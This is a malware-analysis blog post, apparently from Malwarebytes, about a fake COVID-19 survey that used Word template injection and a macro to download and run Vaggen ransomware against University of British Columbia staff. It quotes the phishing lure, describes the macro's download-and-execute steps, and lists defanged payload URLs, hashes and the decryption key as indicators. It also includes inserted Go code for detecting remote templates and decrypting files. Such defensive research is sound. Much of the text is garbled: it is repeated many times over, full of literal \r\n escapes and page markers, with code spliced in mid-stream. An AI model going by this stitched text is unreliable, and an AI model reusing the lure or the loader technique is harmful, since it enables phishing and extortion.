In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether it was successful (the return value is the task ID of the executed application)
If successful, it sends a GET HTTP request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not successful, it sends a GET HTTP request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.

This can be very useful as an early warning notification system that an intruder has had access to a network.
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2605 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2606 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2607 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2608 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2609 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2610 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2611 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2612 of 
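The remote-template check that the Phishing document analysis section above relies on, as an added example that is not part of the original post: it inspects the word/_rels/settings.xml.rels part of a .docx for an attachedTemplate relationship whose target is an http(s) URL, which is the marker that Word will fetch a remote template (here a .dotm carrying the macro) when the file is opened. The placeholder host, the two sample relationship parts and the in-memory zip builder are constructed for this example; a locally attached template also uses TargetMode="External" but with a file:// target, so only network schemes are reported.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// OOXML relationship type that binds a Word document to its template.
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// Package part that holds the attachedTemplate relationship in a .docx.
const settingsRelsPart = "word/_rels/settings.xml.rels"

// Subset of the .rels schema needed for this check.
type relationships struct {
	XMLName xml.Name       `xml:"Relationships"`
	Items   []relationship `xml:"Relationship"`
}

type relationship struct {
	ID         string `xml:"Id,attr"`
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

// isRemote reports whether a relationship target is fetched over the network.
// Locally attached templates (Normal.dotm and the like) use file:// targets.
func isRemote(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://")
}

// ExternalTemplates parses a settings.xml.rels part and returns the target of
// every attachedTemplate relationship that is External and points at an
// http(s) location, i.e. a template Word would download on open.
func ExternalTemplates(relsXML []byte) ([]string, error) {
	var rels relationships
	if err := xml.Unmarshal(relsXML, &rels); err != nil {
		return nil, fmt.Errorf("settings.xml.rels: %w", err)
	}
	var found []string
	for _, r := range rels.Items {
		if r.Type == attachedTemplateType &&
			strings.EqualFold(r.TargetMode, "External") && isRemote(r.Target) {
			found = append(found, r.Target)
		}
	}
	return found, nil
}

// ScanDocx opens an in-memory .docx (a zip package) and reports remote template
// targets. A document with no settings.xml.rels part simply has none.
func ScanDocx(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a zip package: %w", err)
	}
	for _, f := range zr.File {
		if f.Name != settingsRelsPart {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		defer rc.Close()
		data, err := io.ReadAll(rc)
		if err != nil {
			return nil, err
		}
		return ExternalTemplates(data)
	}
	return nil, nil
}

// BuildSampleDocx constructs a minimal zip package containing only the
// settings.xml.rels part so the scanner can run offline. Test fixture only.
func BuildSampleDocx(relsXML string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create(settingsRelsPart)
	_, _ = io.WriteString(w, relsXML)
	_ = zw.Close()
	return buf.Bytes()
}

// Constructed sample: injected remote template (placeholder host, not a real URL).
const InjectedRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://TEMPLATE-HOST.invalid/raw/master/template.dotm" TargetMode="External"/>
</Relationships>`

// Constructed sample: benign local template reference.
const BenignRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file:///C:\Users\me\AppData\Roaming\Microsoft\Templates\Normal.dotm" TargetMode="External"/>
</Relationships>`

func main() {
	for name, rels := range map[string]string{"injected": InjectedRels, "benign": BenignRels} {
		targets, err := ScanDocx(BuildSampleDocx(rels))
		fmt.Printf("%s: remote templates=%v err=%v\n", name, targets, err)
	}
}
```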
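The file recovery described in the Vaggen ransomware section above, as an added example that is neither part of the original post nor the sample's own code: it splits a .VAGGEN blob into the nonce || ciphertext || tag layout given above and opens it with AES-256-GCM under the hardcoded key quoted in the post, rejecting truncated or corrupted files and wrong keys instead of producing garbage. The sample plaintext and the MakeSampleBlob fixture are constructed for this example; the layout assumption is that the tag directly follows the ciphertext, which is what gcm.Seal produces.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"strings"
)

// Layout of a .VAGGEN file as described in the write-up:
//   [12-byte nonce][AES-256-GCM ciphertext][16-byte GCM tag]
// Go's gcm.Seal appends the tag to the ciphertext, so everything after the
// nonce is one Seal output and can be handed to gcm.Open as a unit.
const (
	nonceSize = 12
	tagSize   = 16
	vaggenExt = ".VAGGEN"
)

// VaggenKey is the hardcoded 32-byte AES-256 key quoted in the write-up.
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 needs a 32-byte key, got %d bytes", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // standard GCM: 12-byte nonce, 16-byte tag
}

// DecryptVaggen recovers the plaintext of one .VAGGEN blob. A blob too short to
// hold a nonce and a tag, or whose tag fails to verify (truncated or corrupted
// file, wrong key), is rejected rather than turned into garbage output.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("blob shorter than nonce+tag: not a complete .VAGGEN file")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceSize], blob[nonceSize:]
	plain, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM tag verification failed: %w", err)
	}
	return plain, nil
}

// OriginalName strips the .VAGGEN extension so a recovered file can be written
// back under its pre-encryption name; ok is false when the suffix is absent.
func OriginalName(encName string) (name string, ok bool) {
	if !strings.HasSuffix(encName, vaggenExt) {
		return encName, false
	}
	return strings.TrimSuffix(encName, vaggenExt), true
}

// MakeSampleBlob builds a constructed .VAGGEN blob so the recovery routine can
// be exercised offline: a random 12-byte nonce followed by gcm.Seal output,
// matching the layout above. It is a test fixture, not code from the sample.
func MakeSampleBlob(plaintext, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil // nonce || ciphertext || tag
}

func main() {
	blob, err := MakeSampleBlob([]byte("constructed sample document"), VaggenKey)
	if err != nil {
		panic(err)
	}
	name, _ := OriginalName("report.docx.VAGGEN")
	plain, err := DecryptVaggen(blob, VaggenKey)
	fmt.Printf("%s: %q (err=%v)\n", name, plain, err)

	blob[nonceSize] ^= 0x01 // flip one ciphertext bit: the tag check must fail
	_, err = DecryptVaggen(blob, VaggenKey)
	fmt.Println("tampered blob rejected:", err != nil)
}
```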
IOCs
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2645 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2646 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2647 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2648 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2649 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2650 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2651 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2652 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2653 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2654 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2655 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2656 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2657 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2658 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2659 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
